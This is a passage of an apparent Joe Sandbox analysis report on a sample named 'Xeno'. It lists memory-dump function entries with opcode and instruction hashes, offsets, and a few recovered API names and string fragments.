                            • Opcode Fuzzy Hash: 34885059f9085e4bbcfbbcd216d759fcf1971f6b3b9d4a29b5fa11b818d26347
                            • Instruction Fuzzy Hash: 9E21E42460C7928AD715CF369820737BFD59FE7301F14486EE4C5E7282DB38890AC7AA
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1689a5f88bb74924eec20baff44963788ed4304019a8286734629da0a012c95f
                            • Instruction ID: 794b843a143bcd502fab941c3754c9a69f0820560203a1b601cccb8c4751c18a
                            • Opcode Fuzzy Hash: 1689a5f88bb74924eec20baff44963788ed4304019a8286734629da0a012c95f
                            • Instruction Fuzzy Hash: CE11033628B1205BD30CC724CC96AAA7BE3DBC2308F6A612EE05257781CD7CD503864D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction ID: b81a1004e5e4804e305fb768ae033261721205d57292a4ad13404709f794b4d6
                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction Fuzzy Hash: A4112933A081D40EC3228D3C84005A5BFA30BA7634F19939AF8F59B2D2D6268D8BD359
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc0aa79595b275abc8aa3da5e1bf769271090754294d3210f408a014c42db77a
                            • Instruction ID: 9bbfa5095f94736bdd0b7ac57f9f149f9e7fe846c8efefe0cee6ce9ca4ff5c54
                            • Opcode Fuzzy Hash: cc0aa79595b275abc8aa3da5e1bf769271090754294d3210f408a014c42db77a
                            • Instruction Fuzzy Hash: 02110625A1C7518BD304CF369C20637BBD59BD6301F14886DE5C5E7282EB34890A879A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eb13973a446c5ad41e135496f900d31ac57488ec4e6597898b97c52ad96242e
                            • Instruction ID: 4445cc4d1cf04cbe348668feb623e8a0f4ebef626527683a5a4cfcafee875c9b
                            • Opcode Fuzzy Hash: 0eb13973a446c5ad41e135496f900d31ac57488ec4e6597898b97c52ad96242e
                            • Instruction Fuzzy Hash: 07019EF1B0131157D7209E56E5C1727A2A96F94708F09483EEC0867342DB7DEC68C2AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b12d0630aca062a50208523bffab303bab65f75365dc79f20876aeab8534668
                            • Instruction ID: 160bb0aff718a0d80563d6f2beff850c498fd2fe1c8e11aaffbd6ba781941524
                            • Opcode Fuzzy Hash: 4b12d0630aca062a50208523bffab303bab65f75365dc79f20876aeab8534668
                            • Instruction Fuzzy Hash: FC114C705083808BE3109F69D454B5FBFE4EBD7708F50595CE1C0A62A1DB7AD846CB5B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d087e15d8a4fbb82bac9f476366a1c20cf4d353c3c9f5ad1ea2a5e303191d843
                            • Instruction ID: 1348c57935a82017e2e7d7c0fbe8ed9875164d963f3c324bd06c6802b1a78461
                            • Opcode Fuzzy Hash: d087e15d8a4fbb82bac9f476366a1c20cf4d353c3c9f5ad1ea2a5e303191d843
                            • Instruction Fuzzy Hash: D801C4B8B10210CBE6189F15EC90637B362FB97335FD8552FA086523A4E3346C91D65D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36166aada63f8f746f52f63198250bd09abddde5197fb786955f18ce8a357c26
                            • Instruction ID: aff0648322cd3eb22c8e49e31b70c91ccd7bdb556783ab174ebbdaee0ae4051e
                            • Opcode Fuzzy Hash: 36166aada63f8f746f52f63198250bd09abddde5197fb786955f18ce8a357c26
                            • Instruction Fuzzy Hash: 3C01B53560D3909ED301CE6994406ABFBE29BD7754F18C4AEE4D987282C67CC84A8757
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2eb1cc6a2c45370c73458af01f82d0618735fc6e9c426f69be1b04e2f0c1c130
                            • Instruction ID: f8e2767e4f8b780292dd09947db90586ef83d4d79bd0953a972369d6ed1dfd53
                            • Opcode Fuzzy Hash: 2eb1cc6a2c45370c73458af01f82d0618735fc6e9c426f69be1b04e2f0c1c130
                            • Instruction Fuzzy Hash: F6F0F975914308ABD2104F05AC41D37776EE79E72CF141329F42C132A1E332ED2197A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef34274091a59faee6011be26f6588851a5fd53e4948c962cbb4ad831f3b5260
                            • Instruction ID: e7d746931a02a9e3b8b0465e94f66f676ab71741ea10926aee641c81e01c6aa1
                            • Opcode Fuzzy Hash: ef34274091a59faee6011be26f6588851a5fd53e4948c962cbb4ad831f3b5260
                            • Instruction Fuzzy Hash: DDF0593A7142160BE210CDB5DCC4827F366EBCA210B19453BE940E33C0C872F80282A8
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                            • Instruction ID: 6c094fc25938da344193a14b9d0b09c7a01ce43ceec287ba2bc945c39f2b55b9
                            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                            • Instruction Fuzzy Hash: BCD0A7B19497B10E57598D3814A05B7FBE8EA47612B18159FE4D1E3209D225DC41469C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13030d5922f3eb165a9f49579f097ac0764a073444c7e4405dcd317374b577db
                            • Instruction ID: bc25dbf4981fac7fc1b7aab02ad173fb12000bfe11e5f168385886125b1ce11a
                            • Opcode Fuzzy Hash: 13030d5922f3eb165a9f49579f097ac0764a073444c7e4405dcd317374b577db
                            • Instruction Fuzzy Hash: 7FE086695416414FC7354A2DC0A19F6BFE4D31F118B006C6DA592C3785E15C8846D658
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocString
                            • String ID: +$0$2$4$6$6$9$>$@$B$D$F$H$J$L$N$W$`$a$b$d$e$f$h$j$l$n$p$r$t$v$x$z$|$~
                            • API String ID: 2525500382-875340659
                            • Opcode ID: f523a6bd84bac47ba8271391a5361cccfe3ce0983f1fc1eccc4aec8e8faf0491
                            • Instruction ID: 1a51d386520feef1481d3326c1be35db23ee302095393a555a7615e454403fa2
                            • Opcode Fuzzy Hash: f523a6bd84bac47ba8271391a5361cccfe3ce0983f1fc1eccc4aec8e8faf0491
                            • Instruction Fuzzy Hash: 7D81B22010C7C2C9E336CB3885587DFBFD15BA6328F088E9DD1E95A2D2D2BA4149D767
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: )$/$3$8$9$:$=$>
                            • API String ID: 2610073882-339973730
                            • Opcode ID: 9c3f66a16f01ae6472bcb48f451aa1cc211d4c2398905fb33a3f9486b933c2cf
                            • Instruction ID: e75863d96dd4293cf013c4d79ab50fb00f7e0396072af12bc1f44a37014a5769
                            • Opcode Fuzzy Hash: 9c3f66a16f01ae6472bcb48f451aa1cc211d4c2398905fb33a3f9486b933c2cf
                            • Instruction Fuzzy Hash: EF41056160C7C18ED336DB38885879BBFE26BD7224F088AADD4E94B2D6C775410AC753
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID: .+$g^b)$}V[U
                            • API String ID: 3664257935-2861687672
                            • Opcode ID: c05ad4df0b8df1f83e888981f928685d36c8377a452d6b441c47b5f5a32c864a
                            • Instruction ID: e8de2eb7f5bf02d7fc6ee479da288558e075f19a89de0364b895b614e7ee1860
                            • Opcode Fuzzy Hash: c05ad4df0b8df1f83e888981f928685d36c8377a452d6b441c47b5f5a32c864a
                            • Instruction Fuzzy Hash: E141397050C3819BD7258F24AC54BABBFD1EFE2305F28092DE4DA9B391D7384905CB5A
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424A50
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424ACA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: KB
                            • API String ID: 237503144-1280518528
                            • Opcode ID: 183cef4234aadb8ef86d9048f336f1672ae2b1aee7a0ea23b248324e77fb3bf4
                            • Instruction ID: 9988d06daaa597567f2b9d2f81522f3ca4097dfb541d98b9febc6db249e57a82
                            • Opcode Fuzzy Hash: 183cef4234aadb8ef86d9048f336f1672ae2b1aee7a0ea23b248324e77fb3bf4
                            • Instruction Fuzzy Hash: C2310136B042394FEF14CF64EC117EE67A2FB85704F198178D916AF2D5DEB19A028784